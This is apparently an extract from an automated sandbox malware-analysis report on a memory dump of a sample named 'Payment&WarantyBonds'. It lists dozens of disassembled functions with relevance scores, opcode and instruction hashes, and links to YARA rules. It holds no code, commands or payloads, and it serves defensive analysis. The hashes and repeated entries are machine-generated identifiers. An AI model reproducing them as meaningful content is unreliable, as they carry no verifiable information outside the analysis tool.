                                                                                                                                                                                • Instruction Fuzzy Hash: 10519672D00229DBEF11DF9DD850AAEBBB4AF04B14F494129EA12F7251D7B49E01CBE4
                                                                                                                                                                                Function 0181E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: EXT-
                                                                                                                                                                                • API String ID: 0-1948896318
                                                                                                                                                                                • Opcode ID: 135d9b1af4e0d8c7cdca171e8258aa95b9c344b7a24afaf327922b975ad94413
                                                                                                                                                                                • Instruction ID: d54fc9ccee3b0142d0aebfab3b9c2926582d4ae93fd97759eb4dfd0ef93925cf
                                                                                                                                                                                • Opcode Fuzzy Hash: 135d9b1af4e0d8c7cdca171e8258aa95b9c344b7a24afaf327922b975ad94413
                                                                                                                                                                                • Instruction Fuzzy Hash: D5416F735083169BE712DA69C840B6BBBECAF88718F440D2DFA84D7184E674DB048793
                                                                                                                                                                                Function 0187C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: BinaryHash
                                                                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                                                                • Opcode ID: 704bdafd8cd11c999788028615133150616561d7c15f5368abd9d1852cbac00b
                                                                                                                                                                                • Instruction ID: cfaebaab8a47ede88da140f90fe21f32682a1293718887d028af060e6432444a
                                                                                                                                                                                • Opcode Fuzzy Hash: 704bdafd8cd11c999788028615133150616561d7c15f5368abd9d1852cbac00b
                                                                                                                                                                                • Instruction Fuzzy Hash: E44163B1D0052EABDB21DA54CC84FDEB77CAB45714F0045A5EB08EB141DB309F898FA5
                                                                                                                                                                                Function 01896B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: #
                                                                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                                                                • Opcode ID: 9fd461d5a51962e9beefd3a35b3b32c6b114f61fa8bcb01a400e43af91cbb0cc
                                                                                                                                                                                • Instruction ID: fba21979bffd87878c6cc6d04e908ec4259a1dd1e3bb3a7add5996e6ae4d7f9b
                                                                                                                                                                                • Opcode Fuzzy Hash: 9fd461d5a51962e9beefd3a35b3b32c6b114f61fa8bcb01a400e43af91cbb0cc
                                                                                                                                                                                • Instruction Fuzzy Hash: 36310C31A007599BDF22DF6DC850FAE7BA8DF55708F284028F941EB282E775EA05CB50
                                                                                                                                                                                Function 0188892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0188895E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                • API String ID: 0-702105204
                                                                                                                                                                                • Opcode ID: 3f6b142f366a864286f793af6b24d0b86653b7200d7808a6763c5fd07c3d514b
                                                                                                                                                                                • Instruction ID: cd3517256e2fb0a585fb2f21b6e860262d2d51fc2dfaf8237e5ed038533ee910
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f6b142f366a864286f793af6b24d0b86653b7200d7808a6763c5fd07c3d514b
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D01F2366002059BE631BB59CD84E6A7FA5EF86354B44012CF741D6152CB30AF80CBA2
                                                                                                                                                                                Function 018A2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4b2bfb74ef0d61070f12da1044288baaf4a7167eb76ef94ce55835fbe308fd25
                                                                                                                                                                                • Instruction ID: b996b7078ae41a3097e93dd21356eb66389468116ceec0e9615025190a1ea4f4
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b2bfb74ef0d61070f12da1044288baaf4a7167eb76ef94ce55835fbe308fd25
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D42C4356083419BF735CF68C890A6BBBE6BF88704F88092DFA86D7250D771DA45CB52
                                                                                                                                                                                Function 01898158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6fe954fd4faf6eaa55c8ec25c83ce06cf4422a958bd4a6bde6b57530736f18a1
                                                                                                                                                                                • Instruction ID: b3026dd2780273fc95c0c148fc6e45b9158ea4ff0c6fef6e8adaa3ac441d0e34
                                                                                                                                                                                • Opcode Fuzzy Hash: 6fe954fd4faf6eaa55c8ec25c83ce06cf4422a958bd4a6bde6b57530736f18a1
                                                                                                                                                                                • Instruction Fuzzy Hash: 08425275E002199FDF25CF69C881BADBBF5BF46300F188099E949EB241D7349A85CF50
                                                                                                                                                                                Function 01812840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a25c6ce502f7e27ccc724d33d6f3312000260b284cca23f016db6283407c3c9e
                                                                                                                                                                                • Instruction ID: 5483b70123857fd531b4fc1e56b7fffbc8a16fab79ca623387fcfcecf8216744
                                                                                                                                                                                • Opcode Fuzzy Hash: a25c6ce502f7e27ccc724d33d6f3312000260b284cca23f016db6283407c3c9e
                                                                                                                                                                                • Instruction Fuzzy Hash: 6F32CD70A007998BEB25CF6DC844BBABBFABF84304F24411DD546DB285E735AA41CB91
                                                                                                                                                                                Function 018AA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 08130a14e4737893df796ddb01f57ddaa3f555ac4e68d61fc95bac6ed5956614
                                                                                                                                                                                • Instruction ID: bce0e7ffbf90539d4d5d95b8c15b20d42b39977e8d91815169496b426c126c41
                                                                                                                                                                                • Opcode Fuzzy Hash: 08130a14e4737893df796ddb01f57ddaa3f555ac4e68d61fc95bac6ed5956614
                                                                                                                                                                                • Instruction Fuzzy Hash: 2022C1742046658BFB29CF2DC090772BBF1AF44304F888459E9D6CFA86E775E652CB60
                                                                                                                                                                                Function 01806A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a6483da33f6c657cbe37dfd7eaf801353af7a61f98553d94981a51715b66ecec
                                                                                                                                                                                • Instruction ID: 5ecfc22ffdd6ef8425cf3cf3de8d7f3a918304f9fafd3aff6ccbd113e49431ef
                                                                                                                                                                                • Opcode Fuzzy Hash: a6483da33f6c657cbe37dfd7eaf801353af7a61f98553d94981a51715b66ecec
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E32C271A00609CFDB56CF68C880BAAB7F5FF88304F244569E955EB392E734EA51CB50
                                                                                                                                                                                Function 01824A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                • Instruction ID: a6683f2d182f2a326291267539fa5592a91754e35ad1ec875c029a911ffec01a
                                                                                                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                • Instruction Fuzzy Hash: BEF16371E0022A9BDF16CF99D590BAEBBF9BF44714F048129E905EB341E774DA81CB60
                                                                                                                                                                                Function 0189892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: be4b5461228ae44b06d8826b79b7432d09279818fa1f811ab096b07ab0880bf8
                                                                                                                                                                                • Instruction ID: 93406782b4ee2438e52ec73adad900c6b584ccece8c7b756566ad45c747f9e97
                                                                                                                                                                                • Opcode Fuzzy Hash: be4b5461228ae44b06d8826b79b7432d09279818fa1f811ab096b07ab0880bf8
                                                                                                                                                                                • Instruction Fuzzy Hash: EBD1E271A0060F9BDF15CF69C841ABEBBF1AF8A308F1C8169D955E7241D739EA05CB60
                                                                                                                                                                                Function 018065D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b96f2c41293cb23b851b9f356e9cdbee860f758cdc4d5792a59fe823dd8b33ef
                                                                                                                                                                                • Instruction ID: 494d3fcfa8b50ec21ca1a2db9b6822149b6fd957ed3a8f2d10d25239b5fe89a4
                                                                                                                                                                                • Opcode Fuzzy Hash: b96f2c41293cb23b851b9f356e9cdbee860f758cdc4d5792a59fe823dd8b33ef
                                                                                                                                                                                • Instruction Fuzzy Hash: 80E19F71508345CFC756CF28C880A6ABBE1FF89314F148A6DE595C7391EB31EA15CB92
                                                                                                                                                                                Function 017F8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 381a8f48ebe9ba435308cb229dae1d0a6113696ab0750126548f74d9fd1b5523
                                                                                                                                                                                • Instruction ID: 0d64fa971943df8115d79774e07879579b806675a9eb4ded3b90b4cac03256d4
                                                                                                                                                                                • Opcode Fuzzy Hash: 381a8f48ebe9ba435308cb229dae1d0a6113696ab0750126548f74d9fd1b5523
                                                                                                                                                                                • Instruction Fuzzy Hash: 57D1C371A0060A9BDB14DF68C880BBBB7E5FF54314F14466DEA15DB381E734DA50CB62
                                                                                                                                                                                Function 01888243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                • Instruction ID: ba19f1ec713c1acffe1772e406fb6381ce1e55ba25d583c00de13c1ea5d11004
                                                                                                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                • Instruction Fuzzy Hash: CCB1A574A006099FDF24EF98C940EABBBB9FF86304F94445DAA02D7791DB74EA05CB10
                                                                                                                                                                                Function 01810535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                • Instruction ID: e64c1ae80a20750c2decfa1e52cb4a9dd8695febce881101b7ce0dcae61f7e54
                                                                                                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                • Instruction Fuzzy Hash: 79B1053260464AAFDB11CBA8CC50BBEBBFAAF44304F140555E652DB385DB30EB81CB91
                                                                                                                                                                                Function 018083C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9ee7e95b343e2c0db9a6004f9500f63777e71b10aec98e0e8689841958f0baa6
                                                                                                                                                                                • Instruction ID: aa696d72eaf45fae5aedd2be7453c322dca90e00ab7e36d075bbe0d120954268
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ee7e95b343e2c0db9a6004f9500f63777e71b10aec98e0e8689841958f0baa6
                                                                                                                                                                                • Instruction Fuzzy Hash: C0C169706083458FD765CF19C884BABB7E9BF88304F44492DE989C7291D775EA48CF92
                                                                                                                                                                                Function 017FC427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9dba18bf8aae111821b85a469511fd55364f53c85d5ae259cd8ad111316dd1a4
                                                                                                                                                                                • Instruction ID: 32d9118590433cd8ab0e619d56509956c61f4adbf46fc64e3cc83f45ec92865d
                                                                                                                                                                                • Opcode Fuzzy Hash: 9dba18bf8aae111821b85a469511fd55364f53c85d5ae259cd8ad111316dd1a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 2AB17170A002698BDB65CF58C884BAAF7B5EF44700F1485EDDA4AE7341EB309E85CB21
                                                                                                                                                                                Function 0182E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 960398c9b5c8a6608d1fcf67cb578aaf578ee35e37f51f022c9f673f8542e71e
                                                                                                                                                                                • Instruction ID: 9d0bf0f7ba1b2fb3f5387d82fe87606b3d9b8e54571d35e5834b8a6e6ace2986
                                                                                                                                                                                • Opcode Fuzzy Hash: 960398c9b5c8a6608d1fcf67cb578aaf578ee35e37f51f022c9f673f8542e71e
                                                                                                                                                                                • Instruction Fuzzy Hash: 8BA1E431E006699FEB32DB5CD854FAEBBA9AB00714F050125EB11EB291D774DF80CB95
                                                                                                                                                                                Function 01840185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7f0bca7dd6bd3431f20a18114fb23c04f5ed386e52ea79a19f7a5a2cac821d11
                                                                                                                                                                                • Instruction ID: 8244f284fcdc8851f7e284f6592b14fe36b15207ae5dff29661b674eddceb3e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f0bca7dd6bd3431f20a18114fb23c04f5ed386e52ea79a19f7a5a2cac821d11
                                                                                                                                                                                • Instruction Fuzzy Hash: DCA1BE70A0061E9BDB25CF69C990BABB7B1FF54318F044129EB45DB281EB34EA51CB90
                                                                                                                                                                                Function 018D4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0377b30ccd8cb085acafd1c23cbd75e1292b9b6f2f404d80ac87dd102deb5014
                                                                                                                                                                                • Instruction ID: 914468e9988467b728d7e856ac4fd8f409f97f5734f17bb9b59122712a3990ba
                                                                                                                                                                                • Opcode Fuzzy Hash: 0377b30ccd8cb085acafd1c23cbd75e1292b9b6f2f404d80ac87dd102deb5014
                                                                                                                                                                                • Instruction Fuzzy Hash: 8EA1CA72A04712AFC721DF18C980B5ABBE9FF48754F15062CF589DBA55D734EA00CB92
                                                                                                                                                                                Function 018D2B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                • Instruction ID: f786fbbd803a1d3b5ac9025fb3b1e4c5aa2cce9065843312ef02fe4c6b53cda4
                                                                                                                                                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                • Instruction Fuzzy Hash: CAB11771E0061ADFDF29CFADC880AADBBB6BF48314F148169E915E7355D730AA41CB90
                                                                                                                                                                                Function 018860E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e2f6db530a24d76bf63f1e3fd9406f7e642f0c1dab981a117b19667611ed6f1c
                                                                                                                                                                                • Instruction ID: 5270e3f213830114e3d4881a50b2074bdc774addb04e6985f8709b21f1e7ec2f
                                                                                                                                                                                • Opcode Fuzzy Hash: e2f6db530a24d76bf63f1e3fd9406f7e642f0c1dab981a117b19667611ed6f1c
                                                                                                                                                                                • Instruction Fuzzy Hash: 88917171D0061AAFDB15DF68D884BAEBFB5AF49710F254169E610EB341E734EF009BA0
                                                                                                                                                                                Function 0181E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e8fe0b80a82a9aa696b10df5792da45ea7f82f0e1c452df6720a11d0021a4750
                                                                                                                                                                                • Instruction ID: 228bdd59d62d5c19eac54947c63d122cd11ee9a1df71b693dc136d69bcfc7cbf
                                                                                                                                                                                • Opcode Fuzzy Hash: e8fe0b80a82a9aa696b10df5792da45ea7f82f0e1c452df6720a11d0021a4750
                                                                                                                                                                                • Instruction Fuzzy Hash: 43910432A00616CFEB269B5CC480BB9BBAAEF94718F154169ED06DB288F634DB41C751
                                                                                                                                                                                Function 01856ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dce207bb93221dc039930698f0b0765a5502aed498db0af3a2f7b2b7e3a929b4
                                                                                                                                                                                • Instruction ID: 3edc3101fe2482ed4e3882662e84f3dacb0c79eff4fc0eec1d650aad1eca6bbc
                                                                                                                                                                                • Opcode Fuzzy Hash: dce207bb93221dc039930698f0b0765a5502aed498db0af3a2f7b2b7e3a929b4
                                                                                                                                                                                • Instruction Fuzzy Hash: 01819471E0061A9BDB68CF69C940ABEBBF9FB48710F54852EE845D7640F734DA40CBA4
                                                                                                                                                                                Function 018CAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                • Instruction ID: 5d3ff4bd6297fd3c4caba944c55ae4d3998aa7c5ff0ffe2340f29ba057f41e50
                                                                                                                                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 48816F31A002099BDF19CF9CC880AAEBBB6EF84714F18856DD916DB345EB34EA01CB50
                                                                                                                                                                                Function 0183E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9fede5fb65dac9427aaa71d47a430cf12941e324b98de0cfb6e874b58cfc91ed
                                                                                                                                                                                • Instruction ID: 1ac9ebf2d052c6c0bbdec4c3b8c4d6df763b68b71072e104bb3b1cee32d9baae
